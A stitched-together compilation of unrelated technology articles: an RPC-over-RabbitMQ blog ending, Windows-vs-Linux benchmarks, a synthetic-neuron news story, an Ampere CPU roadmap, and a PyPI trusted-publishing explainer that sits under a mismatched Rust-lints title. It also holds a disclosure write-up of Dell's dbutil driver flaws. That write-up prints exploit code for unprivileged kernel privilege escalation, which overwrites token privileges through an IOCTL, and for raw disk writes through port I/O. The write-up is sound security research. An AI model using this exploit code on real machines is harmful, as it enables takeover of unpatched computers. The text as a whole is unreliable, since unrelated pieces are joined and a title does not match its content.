They do make it clear that this is not a totally production-ready solution. RabbitMQ's "direct reply-to" documentation, which shows an alternative way to do RPCs over RabbitMQ that's built into RabbitMQ. This solution is simpler than ours as it doesn't allow multiple consumers to get messages from a shared response queue, but it's pretty cool. I learned about it while writing this blog post. A nice blog post about RPC over RabbitMQ. Lots of Python code to look at. I need to thank my coworker and friend Tom Patterer, who designed and implemented the system with me and helps me maintain it while our architecture and needs keep growing. I also need to thank José because he pushed me to write this blog post when I chatted with him about all of this.
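As promised above, here are hedged sketches of the caller-side call and of a Broadway-based receiver pipeline. Module, queue, and function names are illustrative, the encoding helpers are placeholders (we actually use Protobuf), and carrying the request ID in the AMQP correlation_id property is an assumption; treat these as sketches of the approach, not our production code.

Caller side, as seen from application code:

case RPC.call("receiver_svc", "get_user", %{user_id: "123"}, timeout: 5_000) do
  {:ok, response} -> response
  {:error, reason} -> {:error, reason}
end

Receiver side, a minimal Broadway pipeline:

defmodule ReceiverSvc.RPCPipeline do
  use Broadway

  alias Broadway.Message

  def start_link(_opts) do
    Broadway.start_link(__MODULE__,
      name: __MODULE__,
      producer: [
        module:
          {BroadwayRabbitMQ.Producer,
           # The queue and its binding to the rpc headers exchange are assumed
           # to be declared elsewhere, as described in the topology above.
           queue: "receiver_svc.rpcs",
           connection: [host: "localhost"],
           # Expose the consuming channel plus the AMQP properties needed to
           # send the reply back.
           metadata: [:amqp_channel, :reply_to, :correlation_id],
           on_failure: :reject_and_requeue},
        concurrency: 2
      ],
      processors: [default: [concurrency: 10]]
    )
  end

  @impl true
  def handle_message(_processor, %Message{} = message, _context) do
    request = decode_request!(message.data)
    response = handle_request(request)

    %{amqp_channel: channel, reply_to: reply_to, correlation_id: correlation_id} =
      message.metadata

    # Publish the reply on the default (nameless) direct exchange, which
    # routes straight to the caller's reply queue named in reply_to.
    :ok =
      AMQP.Basic.publish(channel, "", reply_to, encode_response!(response),
        correlation_id: correlation_id
      )

    message
  end

  # Placeholder codecs and business logic.
  defp decode_request!(binary), do: :erlang.binary_to_term(binary)
  defp encode_response!(term), do: :erlang.term_to_binary(term)
  defp handle_request(request), do: %{echo: request}
end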
2
Intel Core I9 11900K: Five Linux Distros Show Sizable Lead over Windows 11
Now that Windows 11 has been out as stable and the initial round of updates has come out, I've been running fresh Windows 11 vs. Linux benchmarks to see how Microsoft's latest operating system release compares to the fresh batch of Linux distributions. First up is a fresh look at the Windows 11 vs. Linux performance on an Intel Core i9 11900K Rocket Lake system. Microsoft Windows 11 Pro with all stable updates as of 18 October was used for this round of benchmarking on Intel Rocket Lake. The Windows 11 performance was compared to all of the latest prominent Linux distributions, including: - Ubuntu 20.04.3 LTS - Ubuntu 21.10 - Arch Linux (latest rolling) - Fedora Workstation 35 - Clear Linux 35150 All the testing was done on the same Intel Core i9 11900K test system at stock speeds (any frequency differences reported in the system table come down to how the information is exposed by the OS, i.e. base or turbo reporting) with 2 x 16GB DDR4-3200 memory, a 2TB Corsair Force MP600 NVMe solid-state drive, and an AMD Radeon VII graphics card. Each operating system was cleanly installed and then run at its OS default settings to see how the out-of-the-box OS performance compares for these five Linux distributions and Microsoft Windows 11 Pro. But for the TLDR version... Out of 44 tests run across all six operating systems, Windows 11 had just three wins on this Core i9 11900K system. Meanwhile Intel's own Clear Linux platform easily dominated, coming in first place 75% of the time, followed by Fedora Workstation 35 in second place with first-place finishes 9% of the time. The geometric mean for all 44 tests showed Linux clearly in front of Windows 11 for this current-generation Intel platform. Ubuntu / Arch / Fedora were about 11% faster overall than Windows 11 Pro on this system. Meanwhile, Clear Linux was about 18% faster than Windows 11 and enjoyed about 5% better performance overall than the other Linux distributions. Let's look at some of those individual results now.
9
Synthetic brain cells that store 'memories' are possible, new model reveals
(Image credit: Bruce Rolff/Stocktrek Images via Getty) Scientists have created key parts of synthetic brain cells that can hold cellular "memories" for milliseconds. The achievement could one day lead to computers that work like the human brain. These parts, which were used to model an artificial brain cell, use charged particles called ions to produce an electrical signal, in the same way that information gets transferred between neurons in your brain. Current computers can do incredible things, but this processing power comes at a high energy cost. In contrast, the human brain is remarkably efficient, using roughly the energy contained in two bananas to do an entire day's work. While the reasons for this efficiency aren't entirely clear, scientists have reasoned that if they could make a computer more like the human brain, it would require way less energy. One way that scientists try to replicate the brain's biological machinery is by utilizing the power of ions, the charged particles that the brain relies on to produce electricity. The researchers' artificial neuron prototype uses nanofluidic slits to mimic ion channels and allow neurons to communicate like they do in the brain. (Image credit: © Paul Robin, ENS Laboratoire de Physique (CNRS/ENS-PSL/Sorbonne Université/Université de Paris)) In the new study, published in the journal Science on Aug. 6, researchers at the Centre national de la recherche scientifique in Paris, France, created a computer model of artificial neurons that could produce the same sort of electrical signals neurons use to transfer information in the brain; by sending ions through thin channels of water to mimic real ion channels, the researchers could produce these electrical spikes. And now, they have even created a physical model incorporating these channels as part of unpublished, ongoing research. "To my knowledge, it's the first time that people [have done] this with ions," said study co-author Lydéric Bocquet, a physicist at the École Normale Supérieure. At a finer level, the researchers created a system that mimics the process of generating action potentials — spikes in electrical activity generated by neurons that are the basis of brain activity. To generate an action potential, a neuron starts to let in more positive ions, which are attracted to the negative ions inside of the cell. The electrical potential, or voltage across the cell membrane, causes doorways on the cell called voltage-gated ion channels to open, raising the charge even more before the cell reaches a peak and returns to normal a few milliseconds later. The signal is then transmitted to other cells, enabling information to travel in the brain. To mimic voltage-gated ion channels, the researchers modeled a thin layer of water between sheets of graphene, which are extremely thin sheets of carbon. The water layers in the simulations were one, two, or three molecules in depth, which the researchers characterized as a quasi-two-dimensional slit. Bocquet said that the researchers wanted to use this two-dimensional environment because particles tend to react much more strongly in two dimensions than in three, and they exhibit different properties in two dimensions, which the researchers thought might be useful for their experiment. "In physics, two dimensions is very weird," said Bocquet. "So you expect new things to occur."
Testing out the model in a computer simulation, the researchers found that when they applied an electric field to the channel, the ions in the water formed worm-like structures. As the team applied a greater electric field in the simulation, these structures would break up slowly enough to leave behind a "memory," or a hint of the elongated configuration. When the researchers ran a simulation linking two channels and other components to mimic the behavior of a neuron, they found the model could generate spikes in electrical activity like action potentials, and that it "remembered" consistent properties in two different states — one where ions conducted more electricity and one where they conducted less. In this simulation, the "memory" of the previous state of the ions lasted a few milliseconds, around the same time it takes real neurons to produce an action potential and return to a resting state. This is quite a long time for ions, which usually operate on timescales of nanoseconds or less. In a real neuron, an action potential equates to a cellular memory in the neuron; our brains use the opening and closing of ion channels to create this kind of memory. "We have similar memory in the end, but the reason for the phenomenon is very different," Bocquet said. The new model is a version of an electronic component called a memristor, or a memory resistor, which has the unique property of retaining information from its history. But existing memristors don't use liquid, as the brain does. "The typical memristors that I work with, and other people in the literature work with, are solid-state memristors," said Gina Adam, an assistant professor of electrical and computer engineering at George Washington University, who was not involved in the study. This new research on creating fluid memristors is "very promising and very intriguing," Adam added. She also said that while practical brain-like computers are likely a long way away, this research could also help scientists better understand how the brain processes information and develop new theories of brain-like computing. Since conducting this research with computer simulations, Bocquet says he and collaborators at the University of Manchester in the U.K. have brought their theory to life, using it to create an artificial synapse, the part of a neuron that passes on electric signals, and they have started performing experiments with it. "It's exciting because it's a playground now," Bocquet said. "We can explore these things actively." Originally published on Live Science.
193
Dell patches 12-year-old driver vulnerability impacting millions of PCs
CVE-2021-21551 – Hundreds of Millions of Dell Computers at Risk Due to Multiple BIOS Driver Privilege Escalation Flaws Several months ago, I started investigating the security posture of the firmware update driver version 2.3 (dbutil_2_3.sys) module, which seems to have been in use since at least 2009. Today, the firmware update driver component, which is responsible for Dell Firmware Updates via the Dell BIOS Utility, comes pre-installed on most Dell machines running Windows and on freshly installed Windows machines that have been updated. Hundreds of millions of Dell devices have updates pushed on a regular basis, for both consumer and enterprise systems. The driver came to my attention thanks to Process Hacker, which has a great feature that pops up a notification message every time a service gets created or deleted. This led to the discovery of five high severity bugs that have remained undisclosed for 12 years. These multiple high severity vulnerabilities in Dell software could allow attackers to escalate privileges from a non-administrator user to kernel mode privileges. Over the years, Dell has released BIOS update utilities which contain the vulnerable driver for hundreds of millions of computers (including desktops, laptops, notebooks, and tablets) worldwide. Dell has assigned one CVE to cover all the flaws in the firmware update driver, but this single CVE can be broken down into the following five separate flaws: In today’s post, I will describe some of the general problems with this driver. However, to give Dell customers the opportunity to remediate this vulnerability, we are withholding our proof of concept until June 1, 2021. That proof of concept will demonstrate the first local EOP, which arises out of a memory corruption issue. The first and most immediate problem with the firmware update driver arises out of the fact that it accepts IOCTL (Input/Output Control) requests without any ACL requirements. That means that it can be invoked by a non-privileged user:

2: kd> !devobj ffffae077fb47820
Device object (ffffae077fb47820) is for:
 DBUtil_2_3 \Driver\dbutil DriverObject ffffae0782dbce30
Current Irp 00000000 RefCount 1 Type 00009b0c Flags 00000048
SecurityDescriptor ffffd70bdb4f4160 DevExt ffffae077fb47970 DevObjExt ffffae077fb47a10
ExtensionFlags (0x00000800)  DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)
Device queue is not busy.

2: kd> !sd ffffd70bdb4f4160 0x1
[truncated]
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001201bf
->Dacl    : ->Ace[0]: ->SID: S-1-1-0 (Well Known Group: localhost\Everyone)
[truncated]

Allowing any process to communicate with your driver is often a bad practice since drivers operate with the highest of privileges; thus, some IOCTL functions can be abused “by design”. The firmware update driver exposes many functions via IRP_MJ_DEVICE_CONTROL. The most obvious bug to exploit gives you an extremely powerful primitive.
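To illustrate just how low the bar is, here is a minimal sketch (not the withheld proof of concept) of opening the device from an unprivileged user-mode process; the symbolic link name follows the device name shown in the debug output above:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // No administrator rights are needed: the device's DACL grants
    // Everyone (S-1-1-0) read/write access, as shown above.
    HANDLE hDevice = CreateFileW(L"\\\\.\\DBUtil_2_3",
                                 GENERIC_READ | GENERIC_WRITE,
                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
                                 NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFileW failed: %lu\n", GetLastError());
        return 1;
    }

    printf("Obtained a handle to DBUtil_2_3 as an unprivileged user.\n");
    // DeviceIoControl calls such as the ones shown below would go here.

    CloseHandle(hDevice);
    return 0;
}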
Via IOCTL 0x9B0C1EC8, it is possible to completely control the arguments passed to memmove, thus allowing an arbitrary read/write vulnerability: A classic exploitation technique for this vulnerability would be to overwrite the values of Present and Enabled in the Token privilege member inside the EPROCESS of the process whose privileges we want to escalate:

1: kd> dt nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B

This can be triggered and exploited quite simply:

struct ioctl_input_params {
    uint64_t padding1;
    uint64_t address;
    uint64_t padding2;
    uint64_t value_to_write;
};

static constexpr uint64_t MASK_TO_WRITE = MAXULONGLONG;

DWORD bytesReturned = 0;

ioctl_input_params privilege_present_params{ 0 };
privilege_present_params.address = presentAddress;
privilege_present_params.value_to_write = MASK_TO_WRITE;

DeviceIoControl(hDevice, EXPLOITABLE_RW_CONTROL_CODE,
                &privilege_present_params, sizeof(privilege_present_params),
                &privilege_present_params, sizeof(privilege_present_params),
                &bytesReturned, NULL);

ioctl_input_params privilege_enabled_params{ 0 };
privilege_enabled_params.address = enabledAddress;
privilege_enabled_params.value_to_write = MASK_TO_WRITE;

DeviceIoControl(hDevice, EXPLOITABLE_RW_CONTROL_CODE,
                &privilege_enabled_params, sizeof(privilege_enabled_params),
                &privilege_enabled_params, sizeof(privilege_enabled_params),
                &bytesReturned, NULL);

Another interesting vulnerability in this driver is one that makes it possible to run I/O (IN/OUT) instructions in kernel mode with arbitrary operands (LPE #3 and LPE #4). This is less trivial to exploit and might require using various creative techniques to achieve elevation of privileges. Since IOPL (I/O privilege level) equals CPL (current privilege level), it is obviously possible to interact with peripheral devices such as the HDD and GPU to either read/write directly to the disk or invoke DMA operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process. The following code illustrates direct read/write using ATA port IO and shows how to invoke those IOCTLs (IN/OUT wrappers are abstracted):

void port_byte_out(unsigned short port, unsigned char payload) {
    unsigned char data[16] = { 0 };
    *((unsigned long *)((unsigned char *)data)) = port;
    *((unsigned char *)((unsigned char *)data + 4)) = payload;
    bResult = DeviceIoControl(hDevice, IOCTL_BYTE_OUT, data, sizeof(data),
                              data, sizeof(data), &junk, NULL);
    if (!bResult) {
        printf("error in port_byte_out: %x\r\n", GetLastError());
    }
}

unsigned char port_byte_in(unsigned short port) {
    unsigned char data[16] = { 0 };
    *((unsigned long *)((unsigned char *)data)) = port;
    bResult = DeviceIoControl(hDevice, IOCTL_BYTE_IN, data, sizeof(data),
                              data, sizeof(data), &junk, NULL);
    if (!bResult) {
        printf("error in port_byte_in: %x\r\n", GetLastError());
    }
    return data[0];
}

Writing directly to the HDD without creating an IRP for that disk write basically bypasses all security mechanisms in the operating system and allows an attacker to write to any sector on the disk.
For example, here is code from the LearnOS repository that takes advantage of IN/OUT instructions for direct HDD writing:

void write_sectors_ATA_PIO(uint32_t LBA, uint8_t sector_count, uint32_t* bytes) {
    ATA_wait_BSY();
    port_byte_out(0x1F6, 0xE0 | ((LBA >> 24) & 0xF));
    port_byte_out(0x1F2, sector_count);
    port_byte_out(0x1F3, (uint8_t) LBA);
    port_byte_out(0x1F4, (uint8_t)(LBA >> 8));
    port_byte_out(0x1F5, (uint8_t)(LBA >> 16));
    port_byte_out(0x1F7, 0x30); // Send the write command
    for (int j = 0; j < sector_count; j++) {
        // per-sector data-out loop truncated in the original excerpt
    }
}

Interestingly, unrelated to the IOCTL handler bugs, the driver file itself is located in C:\Windows\Temp, which is also a bug itself and opens the door to other issues. The classic way to exploit this would be to transform any BYOVD (Bring Your Own Vulnerable Driver) into an Elevation of Privileges vulnerability, since loading a (vulnerable) driver means you require administrator privileges, which essentially eliminates the need for a vulnerability. Thus, using this side-noted issue virtually means you can turn any BYOVD into an Elevation of Privileges. Here you can see a proof-of-concept to demonstrate the first LPE due to memory corruption: The high severity flaws could allow any user on the computer, even without privileges, to escalate their privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products. An attacker with access to an organization’s network may also gain access to execute code on unpatched Dell systems and use this vulnerability to gain local elevation of privilege. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement. This vulnerability and its remedies are described in Dell Security Advisory DSA-2021-088. We recommend that Dell customers, both enterprise and consumer, apply the patch as soon as possible. While Dell is releasing a patch (a fixed driver), note that the certificate was not yet revoked (at the time of writing). This is not considered best practice since the vulnerable driver can still be used in a BYOVD attack as mentioned earlier. Please see the Dell Security Advisory for complete remediation details. These high severity vulnerabilities, which have been present in Dell devices since 2009, affect hundreds of millions of devices and millions of users worldwide. Similar to a previous vulnerability I disclosed that hid for 12 years, the impact this could have on users and enterprises that fail to patch is far-reaching and significant. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, with hundreds of millions of enterprises and users currently vulnerable, it is inevitable that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action. We would like to thank Dell for their approach to our disclosure and for remediating the vulnerabilities.
1 Dec 2020 – Initial report
2 Dec 2020 – Dell replied with ticket numbers
8 Dec 2020 – Dell requested more information
9 Dec 2020 – Dell requested additional information
22 Dec 2020 – Dell replied that a fix should be available in mid-April
12 Jan 2021 – Dell replied that some of the vulnerabilities will not be fixed since the product is EOL
27 Jan 2021 – Dell requested more time
16 Mar 2021 – Dell updated that they are cooperating with Microsoft and a fix should be available by the end of April
29 Mar 2021 – Dell requested more time, confirmed that an update should be available by the end of April
22 Apr 2021 – Dell initiated a Zoom conference call to discuss the blog post release
04 May 2021 – Initial research released to the public
2
Ampere Roadmap Update: Switching to In-House CPU Designs, 128 5nm Cores in 2022
Today we’re covering some news of the more unusual type: a roadmap update from Ampere, and a closer look at what the company is planning in terms of the architectural and microarchitectural choices of their upcoming next-generation server CPUs in 2022 and onwards. For people not familiar with Ampere, the company was founded back in 2017 by former Intel president Renée James, notably built upon a group of former Intel engineers who had left along with her for the new adventure. Initially, the company relied on IP and design talent from AppliedMicro’s X-Gene CPUs, and it still supports legacy products such as the eMAG line-up. With Arm having started a more emphasised focus on designing and releasing datacentre and enterprise CPU IP line-ups in the form of the new Neoverse core offerings a few years back, over the last year or so we have finally seen the fruits of these efforts in the form of several implementations of the first-generation Neoverse N1 server CPU core, such as Amazon’s Graviton2 and, more importantly, Ampere’s “Altra Quicksilver” 80-core server CPU. The Altra Q line-up, for which we reviewed the flagship Q80-33 SKU last winter, was inarguably one of the most impressive Arm server CPU executions in past years, with the chip being able to keep up with or beat the best AMD and Intel had to offer, even maintaining that positioning against the latest Xeon and EPYC generations. Ampere’s next-generation “Mystique” Altra Max is the next product on the roadmap, and is targeted to be sampling in the next few months and released later this year. The design relies on the same first-generation Arm Neoverse N1 cores, at the same maximum 250W TDP, as a drop-in replacement on the same platform, however with an optimised implementation that now allows for up to 128 CPU cores – 60% more cores than the first iteration of Altra we have today, and double the amount of cores of competitor systems from AMD or Amazon’s Graviton2. For designs beyond the Altra Max, Ampere is promising a continued emphasis on what they consider “predictable performance” for workloads as socket load scales, increasing core counts with a linear increase in performance, and – what I found interesting as a metric – a continued reduction in power per core. That is something to keep in mind as we’re discussing the next big news today: Today’s big reveal concerns the CPU IP that Ampere is going to be using starting with their next-generation 2022 “Siryn” design, successor to the Altra Max. Starting with Siryn, Ampere will be switching over from Arm’s Neoverse cores to their new in-house full custom CPU microarchitecture. This announcement admittedly caught us completely off-guard, as we had largely expected Ampere to continue to be using Arm’s Neoverse cores for the foreseeable future. The switch to a new full custom microarchitecture puts Ampere on a completely different trajectory than we had initially expected from the company. In fact, Ampere explains that the move towards a full custom microarchitecture core design was actually always the plan for the company since its inception, and their custom CPU design had been in the works for the past 3+ years. In terms of background, the design team leading the effort is led by Ampere’s CTO Atiq Bajwa, who is also acting as the chief architect on the project.
Bajwa and the team surrounding him appear to be mostly composed of high-profile ex-Intel engineers and veterans who had left the company along with Renée James in 2017, topped off with talent from a slew of other companies in the industry who joined them in the effort. The pedigree and history of the team are marked by achievements such as working on Intel’s Haswell and Broadwell processors. Ampere’s rationale for designing a full custom core from the ground up is that they claim to be able to achieve better performance and better power efficiency in datacentre workloads compared to what Arm’s Neoverse “more general purpose” designs are able to achieve. This is quite an interesting claim to make, and it contrasts with Arm’s projections and goals for their Neoverse cores. The recent Neoverse V1 and N2 cores were unveiled in more detail last month and are claimed to achieve significant generational IPC gains. For Ampere to relinquish the reliance on Arm’s next-gen cores, and instead to rely on their own design and actually go forward with that switch in the next-gen product, shows a sign of great confidence in their custom microarchitecture design – and at the same time one could interpret it as a sign of no confidence in Arm’s Neoverse IP and roadmap. This stands in stark juxtaposition to what others are doing in the industry: Marvell has stopped development of their own ThunderX CPU IP in favour of adopting Arm Neoverse cores. On the other hand, not specifically related to the cloud and server market, Qualcomm acquired Nuvia earlier this year, and their rationale and explanation were similar to Ampere’s in that they’re claiming that the new in-house design capabilities offered performance that otherwise wouldn’t have been possible with Arm’s Cortex CPU IP. In our talks with Jeff Wittich, Ampere’s Chief Product Officer, he explained that today’s announcement should hopefully help paint a better picture of where Ampere is heading as a company – whether they’d continue to be content with “just” being an Arm IP integrator, or if they had plans for more. Jeff was pretty clear that in a few years’ time they’re envisioning and aiming for Ampere to be a top CPU provider for the cloud market and a major player in the industry. The technical details of how Ampere’s CPU microarchitecture will differ in approach, and why they see it as a superior performer in the cloud, are questions we’ll have to be a bit more patient to hear answered. The company wouldn’t comment on the exact status of the Siryn design right now – on whether it’s been taped in or taped out yet – but they do reiterate that they’re planning customer sampling in early 2022 in accordance with prior roadmap disclosures. By the tone of the discussions, it seems the design is mostly complete, and Ampere is doing the finishing touches on the whole SoC. Jeff mentioned that in due time they will also be doing microarchitectural disclosures on the new core, explaining their design choices in things like front-end or back-end design, and why they see it as a better fit for the cloud market. Beyond the longer-term >2022 plans, today’s roadmap update also contained a few more performance claim reiterations of Ampere’s upcoming 128-core Altra Max product, which is planned to hit the market in the second half of the year, with customers being sampled in the next few months.
The “Mystique” code-named Altra Max design is characterised by a 60% increase in core count versus the current-generation Altra design, all while remaining at or below the same 250W TDP. The performance slides showcase comparisons and performance claims against what are by now previous-generation competitor products; Ampere simply explains they haven’t been able to get their hands on more recent Milan or Ice Lake-SP hardware to test. Nevertheless, the relative positioning against the Altra Q80-30 and the EPYC 7742 would indicate that the new chip would easily surpass the performance of even AMD’s latest EPYC 7763. In the slide, Ampere actually discloses the SKU model name being used for the comparison, which is the "Altra Max M128-30" – meaning for the first time we have confirmation that all 128 cores run at up to 3GHz clock speed, which is impressive given that we’re supposed to be seeing the same TDP and power characteristics between it and the Q80-33. We’ll be verifying these figures in the next few months once we get to review the Altra Max.

Today’s announcement also comes with an update on Ampere’s customers. Oracle was notably one of the first Altra adopters, but today’s disclosure also includes a wider range of cloud providers, with big names such as ByteDance and Tencent Cloud, two of the biggest hyperscalers in China. Microsoft in particular is a big addition to the customer list, and while Ampere’s Jeff Wittich couldn’t comment on whether Microsoft has other internal plans in the works, he said that today’s announcement should give more clarity around the rumours of the Redmond company working on Arm-based servers, reports of which had surfaced back in December. Microsoft’s Azure cloud service is second only to Amazon’s AWS in terms of size and scale, and the company onboarding Altra products is a massive win for Ampere.

Today’s announcement that Ampere will deploy its own microarchitecture in future products is a major change in the company’s prospects. The news admittedly took us by surprise, but in the grand scheme of things it makes a lot of sense given that the company aims to be a major industry player in the next few years – taking full control of one’s own product future is critical in terms of assuring that success. While over the years we’ve seen many CPU design teams be disbanded, actually having a new player and microarchitecture pop up is a very welcome change for the industry. While the news is a blow to Arm’s Neoverse IP, the fact that Ampere continues to use the Arm architecture is a further encouragement and win for the Arm ecosystem.
1
Write Rust lints without forking Clippy
Read the official announcement on the PyPI blog as well! For the past year, we’ve worked with the Python Package Index to add a new, more secure authentication method called “trusted publishing.” Trusted publishing eliminates the need for long-lived API tokens and passwords, reducing the risk of supply chain attacks and credential leaks while also streamlining release workflows. Critical packages on PyPI are already using trusted publishing to make their release processes more secure. If you publish packages to PyPI, use the official PyPI documentation to set up trusted publishing for your projects today. The rest of this post will introduce the technical how and why of trusted publishing, as well as where we’d like to see similar techniques applied in the future. We love to help expand trust in language ecosystems. Contact us if you’re involved in a packaging ecosystem (e.g., NPM, Go, Crates, etc) and want to adopt more of these techniques! Trusted publishing: a primer At its core, trusted publishing is “just” another authentication mechanism. In that sense, it’s no different from passwords or long-lived API tokens: you present some kind of proof to the index that states your identity and expected privileges; the index verifies that proof and, if valid, allows you to perform the action associated with those privileges. What makes trusted publishing interesting is how it achieves that authentication without requiring a preexisting shared secret. Let’s get into it! OpenID Connect and “ambient” credentials Trusted publishing is built on top of OpenID Connect (OIDC), an open identity attestation and verification standard built on top of OAuth2. OIDC enables identity providers (IdPs) to produce publicly verifiable credentials that attest to a particular identity (like hamilcar@example.com) . These credentials are JSON Web Tokens (JWTs) under the hood, meaning that an identity under OIDC is the set of relevant claims in the JWT. To drive that point home, here’s what a (slightly redacted) claim set might look like for a user identity presented by GitHub’s OIDC IdP: (In an actual JWT, this claim set would be accompanied by a digital signature proving its authenticity for a trusted signing key held by the IdP. Without that digital signature, we’d have no reason to trust the claims!) Anybody can be an IdP in an OpenID Connect scheme. Still, a large part of the practical value of OIDC is derived from interactions with large, presumed-to-be-trustworthy-and-well-secured IdPs. There’s value in proving ownership over things like GitHub and Google accounts, particularly for things like SSO and service federation. So far, so good, but none of this is especially relevant to packaging indices like PyPI. PyPI could allow users to sign in with OIDC rather than passwords, but it’s unclear how that would make publishing workflows, particularly CI-based ones, any more convenient. What makes OIDC useful to package indices like PyPI is the observation that an OIDC identity doesn’t need to be a human: it can be a machine identifier, a source repository, or even a specific instance of a CI run. Moreover, it doesn’t need to be obtained through an interactive OAuth2 flow: it can be offered “ambiently” as an object or resource that only the identity (machine, etc.) can access. CI providers figured this out not too long ago: GitHub Actions added support for ambient OIDC credentials in late 2021, while GitLab added it just a few months ago. 
On GitHub Actions, retrieving one of those credentials amounts to requesting a short-lived token from an endpoint that only the running workflow can reach (a rough sketch of this appears after the publishing steps below), and the (again, filtered) claim set for a workflow run carries workflow-specific context. This is a lot of context to work with: assuming that we trust the IdP and that the signature checks out, we can verify the identity down to the exact GitHub repository, the workflow that ran, the user that triggered the workflow, and so forth. Each of these can, in turn, become a constraint in an authentication system.

Trust is everything

To recap: OpenID Connect gives us the context and machinery we need to verify proofs of identity (in the form of OIDC tokens) originating from an IdP. The identities in these proofs can be anything, including the identity of a GitHub Actions workflow in a particular repository. Any third-party service (like PyPI) can, in turn, accept OIDC tokens and determine a set of permissions based on them. Because OIDC tokens are cryptographically tied to a particular OIDC IdP’s public key, an attacker cannot spoof an OIDC token, even if they know the claims within it.

But wait a second: how do we get from an OIDC token containing an identity to a specific PyPI project? How do we know which PyPI project(s) should trust which OIDC identity or identities? This is where a bit of trusted setup is required: a user (on PyPI) has to log in and configure the trust relationship between each project and the publishers (i.e., the OIDC identities) that are authorized to publish on behalf of the project. This needs to be done only once, as with a normal API token. Unlike an API token, however, it only involves one party: the CI (and OIDC) provider doesn’t need to be given a token or any other secret material. Moreover, even the trusted setup part is composed of completely public information: it’s just the set of claim values that the user considers trustworthy for publishing purposes. For GitHub Actions publishing to PyPI, the trusted setup would include the following:

- The GitHub user/repo slug
- The filename of the GitHub Actions workflow that’s doing the publishing (e.g., release.yml)
- Optionally, the name of a GitHub Actions environment that the workflow uses (e.g., release)

Together, these pieces of state allow the relying party (e.g., PyPI) to accept OIDC tokens, confirm that they’re signed by a trusted identity provider (e.g., GitHub Actions), and then match the signed claims against one or more PyPI projects that have established trust in those claims.

Look ma, no secrets!

At this point, we have everything we need to allow an identity verified via OIDC to publish to PyPI. Here’s what that looks like in the GitHub case:

1. A developer (or automation) triggers a GitHub Actions workflow to release to PyPI.
2. The normal build process (python -m build or similar) commences.
3. Automation retrieves an OIDC token for the current workflow run, attesting to the current workflow’s identity (user/repo, workflow name, environment, etc.) via GitHub Actions’ OIDC IdP.
4. That OIDC token is shot over to PyPI.
5. PyPI verifies it and, if valid, exchanges it for a short-lived PyPI API token that’s scoped to just the PyPI projects that trust those token claims.
6. PyPI returns the short-lived API token as a response to the OIDC token.
7. The workflow continues, performing a normal PyPI publish step (e.g., with twine) with the short-lived API token. 
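To make steps 3 through 6 more concrete, here is a minimal, hedged Python sketch of what the token retrieval and exchange could look like if performed by hand. It relies on GitHub Actions' documented ACTIONS_ID_TOKEN_REQUEST_URL and ACTIONS_ID_TOKEN_REQUEST_TOKEN environment variables; the PyPI token-minting endpoint and response shapes are assumptions for illustration only, since the official publishing action handles the real exchange for you.

import json
import os
import urllib.request

# Step 3: ask GitHub Actions' OIDC IdP for an identity token for this workflow run.
# These environment variables are only populated when the job has `id-token: write`.
req = urllib.request.Request(
    os.environ["ACTIONS_ID_TOKEN_REQUEST_URL"] + "&audience=pypi",
    headers={"Authorization": "bearer " + os.environ["ACTIONS_ID_TOKEN_REQUEST_TOKEN"]},
)
with urllib.request.urlopen(req) as resp:
    oidc_token = json.load(resp)["value"]

# Steps 4-6: hand the OIDC token to PyPI and receive a short-lived, scoped API token back.
# The endpoint path and response field below are assumptions for illustration.
mint_req = urllib.request.Request(
    "https://pypi.org/_/oidc/mint-token",
    data=json.dumps({"token": oidc_token}).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(mint_req) as resp:
    api_token = json.load(resp)["token"]

# Step 7: the short-lived token is then used like any other PyPI API token, e.g.
# TWINE_USERNAME=__token__ TWINE_PASSWORD=<api_token> twine upload dist/*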
For 99% of package publishers, steps 3 through 7 are entirely implementation details: the official PyPA GitHub Action for publishing to PyPI encapsulates them, making the user-facing piece just a single, secrets-free publish step in the release workflow.

Why should I care?

At this point, you might reasonably think: “I’m a competent engineer, and I already do everything right. My tokens are correctly scoped to the smallest permissions required, they’re stored as workflow (or per-environment) secrets, and I carefully audit my release workflows to ensure that all third-party code is trustworthy.” – You, a competent engineer

Here’s the thing: you’ve been doing everything right! Until now, the most secure way to authenticate to PyPI was to do the following:

1. Create a project-scoped API token.
2. Store it as a (scoped) secret in your CI.
3. Access it carefully in a publishing workflow you’ve reviewed and established trust in.

This suffices for many use cases but also leaves a great deal to be desired from both the usability and security perspectives:

- Usability. Manually managing and creating API tokens is tedious, especially in scenarios where a single source repository hosts multiple PyPI packages: each needs its own separately scoped token, a unique secret name, and so forth. You and your fellow engineers have better ways to spend your time!
- Pre-compromise security. Not all attackers are born equal: some are passive, some are active, some might be able to compromise only a specific step in your publishing process, and so forth. Reducing the power of (or outright eliminating) one of these attackers is useful, even when the mitigation involved doesn’t meaningfully impact other attackers. Unfortunately, doing so with long-lived tokens is difficult: a long-lived token is equally susceptible to any attacker who gets access for any amount of time.
- Post-compromise recovery. Designing for security means attempting to thwart attackers and preparing for and mitigating the risk posed by a successful attacker. With long-lived credentials (either passwords or API tokens), this is slow, tedious, and error-prone: missing a single credential leaves a gap for the attacker to return. A better system wouldn’t have this problem to begin with.

Trusted publishing addresses these problems and more:

- Usability. With a trusted publisher, no manual API token management is necessary: configuring the publisher is a one-time action for each project, including for projects that haven’t been created yet. This avoids the annoying API token dance involved when publishing a brand new project and the game of “credential hot potato” that engineers play when trying to hand an API token to the party responsible for adding it to the CI’s secrets. No more Slack DMs with API tokens!
